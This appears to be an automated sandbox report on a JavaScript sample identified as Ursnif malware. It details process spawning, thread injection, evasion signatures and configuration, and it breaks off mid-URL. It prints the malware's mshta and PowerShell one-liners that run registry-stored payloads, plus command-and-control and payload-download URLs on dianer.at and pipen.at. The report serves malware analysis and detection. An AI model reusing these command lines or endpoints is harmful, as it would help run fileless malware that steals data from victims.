Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\my_presentation_o6y.js'
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\TAvvi.txt
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\TAvvi.txt
Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5332 CREDAT:17410 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5332 CREDAT:82950 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5332 CREDAT:17432 /prefetch:2
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\TAvvi.txt
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\TAvvi.txt
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5332 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5332 CREDAT:82950 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5332 CREDAT:17432 /prefetch:2
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Reads internet explorer settings
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Submission file is bigger than most known malware samples
Source: my_presentation_o6y.js | Static file information: File size 3553741 > 1048576
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dll
Binary contains paths to debug symbols
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000011.00000002.1204970054.0000000007010000.00000002.00000001.sdmp
Source: Binary string: c:\Users\Randy\OneDrive\Projects\formoney\microtor\bin\x64\Release\tordll.pdb | source: explorer.exe, 00000011.00000002.1204572263.0000000005BDB000.00000002.00000001.sdmp
Source: Binary string: c:\exercise\Study\just\month\fraction\shortBorn.pdb | source: TAvvi.txt.0.dr
Source: Binary string: ntdll.pdb | source: regsvr32.exe, 00000004.00000003.1122651667.0000000006600000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP | source: regsvr32.exe, 00000004.00000003.1122651667.0000000006600000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000011.00000002.1204970054.0000000007010000.00000002.00000001.sdmp

Data Obfuscation:

Suspicious powershell command line found
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
PE file contains an invalid checksum
Source: TAvvi.txt.0.dr | Static PE information: real checksum: 0x31b79 should be: 0x38b9c
Binary may include packed or encrypted code
Source: initial sample | Static PE information: section name: .text entropy: 6.81480463595

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\TAvvi.txt
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\TAvvi.txt

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.1011270018.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1011384167.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1011678678.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1204294461.0000000005B3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.1129699118.000001DE97D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1011483146.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1118478051.0000000005F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1011647526.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1010975303.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1011574267.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1011138390.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1036927983.0000000005ABB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 5652, type: MEMORY
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 2928, type: MEMORY
Source: Yara match | File source: Process Memory Space: control.exe PID: 5928, type: MEMORY
May use the Tor software to hide its network traffic
Source: explorer.exe, 00000011.00000002.1204600072.0000000005BE0000.00000004.00000001.sdmp | Binary or memory string: onion-port
Disables application error messages (SetErrorMode)
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 identical entries)
Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX (3 identical entries)
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (118 identical entries)

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6250
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2550
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4212 | Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\regsvr32.exe | Last function: Thread delayed
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: explorer.exe, 00000011.00000002.1205717068.0000000007340000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000011.00000002.1207879160.0000000007CD5000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000011.00000002.1205717068.0000000007340000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000011.00000002.1205717068.0000000007340000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000011.00000002.1205717068.0000000007340000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe | File created: TAvvi.txt.0.dr
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\System32\control.exe base: CD0000 protect: page execute and read and write
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\control.exe | Thread created: C:\Windows\explorer.exe EIP: 352A1000
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\regsvr32.exe | Thread register set: target process: 5928
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\System32\control.exe base: CD0000
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\TAvvi.txt
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
May try to detect the Windows Explorer process (often used for injection)
Source: explorer.exe, 00000011.00000000.1143604429.0000000001170000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000011.00000000.1143604429.0000000001170000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000011.00000000.1143604429.0000000001170000.00000002.00000001.sdmp | Binary or memory string: hProgram ManagerWE
Source: explorer.exe, 00000011.00000000.1143604429.0000000001170000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000011.00000002.1187564389.0000000000A30000.00000004.00000020.sdmp | Binary or memory string: Progman{
Source: explorer.exe, 00000011.00000002.1187564389.0000000000A30000.00000004.00000020.sdmp | Binary or memory string: PProgmancci\Ap

Language, Device and Operating System Detection:

Queries the installation date of Windows
Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (6 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (5 identical entries)
Queries the cryptographic machine GUID
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match | File source: the same 15 memory-dump and process-memory matches listed under "Hooking and other Techniques for Hiding and Protection" above (regsvr32.exe PID 5652, explorer.exe PID 2928, control.exe PID 5928 and their dumps)

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match | File source: the same 15 memory-dump and process-memory matches listed under "Hooking and other Techniques for Hiding and Protection" above (regsvr32.exe PID 5652, explorer.exe PID 2928, control.exe PID 5928 and their dumps)

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "300", "system": "e1aacfc175c0ccc76580dfb2735a8c76hh-", "size": "200777", "crc": "2", "action": "00000000", "id": "3000", "time": "1586236904", "user": "31b341dd54c8a3b79c4b2eb58a414dc9", "hash": "0x43f98375", "soft": "3"}

Behavior Graph

Legend (graph icons): Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet

Behavior Graph ID: 220655; Sample: my_presentation_o6y.js; Startdate: 06/04/2020; Architecture: WINDOWS; Score: 100

The graph is an image in the original report; its node contents are listed below. Numbers in parentheses are the graph's node IDs; numbers following a process name are the per-node counters shown on the graph (see legend).

  • Sample (2): DNS/IP: api10.dianer.at (42). Signatures: Multi AV Scanner detection for domain / URL (46); Found malware configuration (48); Multi AV Scanner detection for dropped file (50); 9 other signatures (52). Started: wscript.exe 3 (11); iexplore.exe 5 432 (15).
  • wscript.exe (11): Dropped: C:\Users\user\AppData\Local\Temp\TAvvi.txt, PE32 (40). Signature: Benign windows process drops PE files (62). Started: regsvr32.exe (17).
  • iexplore.exe (15): Started: iexplore.exe 10 259 (19); iexplore.exe 258 (22); iexplore.exe 258 (24).
  • regsvr32.exe (17): Started: regsvr32.exe 2 1 (26).
  • iexplore.exe (19): DNS/IP: f1.pipen.at 5.101.51.143, ports 49749, 49750, 49751, unknown, Russian Federation (44).
  • regsvr32.exe (26): Signatures: Writes to foreign memory regions (54); Allocates memory in foreign processes (56); Modifies the context of a thread in another process (thread injection) (58); 4 other signatures (60). Started: mshta.exe (29); control.exe (32).
  • mshta.exe (29): Signature: Suspicious powershell command line found (64). Started: powershell.exe (34).
  • control.exe (32): Signature: Creates a thread in another existing process (thread injection) (66). Injected: explorer.exe (36).
  • powershell.exe (34): Started: conhost.exe (38).

Simulations

Behavior and APIs

Time | Type | Description
22:21:54 | API Interceptor | 41x Sleep call for process: powershell.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\TAvvi.txt | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\TAvvi.txt | 15% | Virustotal | | Browse

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label | Link
api10.dianer.at | 5% | Virustotal | | Browse
f1.pipen.at | 8% | Virustotal | | Browse

URLs

Source | Detection | Scanner | Label | Link
http://www.founder.com.cn/cn/bThe | 1% | Virustotal | | Browse
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
http://constitution.org/usdeclar.txtC: | 0% | URL Reputation | safe |
http://f1.pipen.at/api1/8iQXGwCpzdKMz8g3/vR1Bs0PsJjWOKd0/CgIrsJRd_2BvCvUxkm/EXOKfEHNo/sYKGsI3cQNMqIc2s8Lkt/2WJiM46ejLxs3iANNJ9/h0d_2F80v8eQI71I9xW1ix/X25fj7vexiZHH/25toGcJ2/4qCC4KWagf38YJweMGTX2yy/g2VE2_2FE4/qml86HUU6i7BR1mLC/EYgG2gZ_2BJv/tirHghlS6iC/oeDlpjoTA6Q2pQ/XDM2St3rAcudiIsIc_2B9/FXw73bdttSLdvg_0/A_0DzW3gUjl_2Fr/YsYX0XolzoV8_2Fstv/ZS_2BgcF_/2FGwEtDMf1jKkxNFe920/LlyrF9mJyINdvtY/9G_2F | 0% | Avira URL Cloud | safe |
http://https://file://USER.ID%lu.exe/upd | 0% | Avira URL Cloud | safe |
http://www.tiro.com | 0% | Virustotal | | Browse
http://www.tiro.com | 0% | URL Reputation | safe |
http://api10.dianer.at/jvassets/xI/t64.dat | 3% | Virustotal | | Browse
http://api10.dianer.at/jvassets/xI/t64.dat | 0% | Avira URL Cloud | safe |
http://www.goodfont.co.kr | 0% | Virustotal | | Browse
http://www.goodfont.co.kr | 0% | URL Reputation | safe |
http://www.carterandcone.coml | 0% | URL Reputation | safe |
http://www.sajatypeworks.com | 0% | Virustotal | | Browse
http://www.sajatypeworks.com | 0% | URL Reputation | safe |
http://www.typography.netD | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/cThe | 0% | Virustotal | | Browse
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
http://f1.pipen.at/favicon.ico | 0% | Avira URL Cloud | safe |
http://fontfabrik.com | 0% | Virustotal | | Browse
http://fontfabrik.com | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn | 0% | Virustotal | | Browse
http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
http://f1.pipen.at/api1/olUj7VUg1W3_2B/Cm5em_2FIcoskF811yIlL/i5nyfJyOrsWaXAKa/wBuJs4wlgM_2BIy/t7o6sF4_2BEpb09e9D/e5ZukIG8o/FlemDlH5hm_2F_2BFN0s/2ZhIljtSaDFHSFEhyew/jBOrkKF_2FTTlaXJ3G7bcb/cK8SP8_2BRVIR/lu4YunYb/C7Y1WSSkLn2bCWF59L8cx45/SfuRwGoB6R/TJl48VgwKcXEC54Kl/Bzq0fT7_2FF_/2FQVuwY6mBp/UM3AQAfl6p2rLp/cMcs9TfWup_0A_0DRyv7X/E31Y4NNdfiq4NT8k/Gaeagtq3m74H3qK/lt2GxcKXxzzH0ftWw1/79Q1BmnDc/bht_2FB | 0% | Avira URL Cloud | safe |
http://f1.pipen.at/api1/fwo7DZYH_2BAKA9AO/nNoc7nnjpHEi/npqhf3GSHBr/v2V9gDEMWaip2f/WTZSyEKW70I6E_2BOGX8L/f1xas9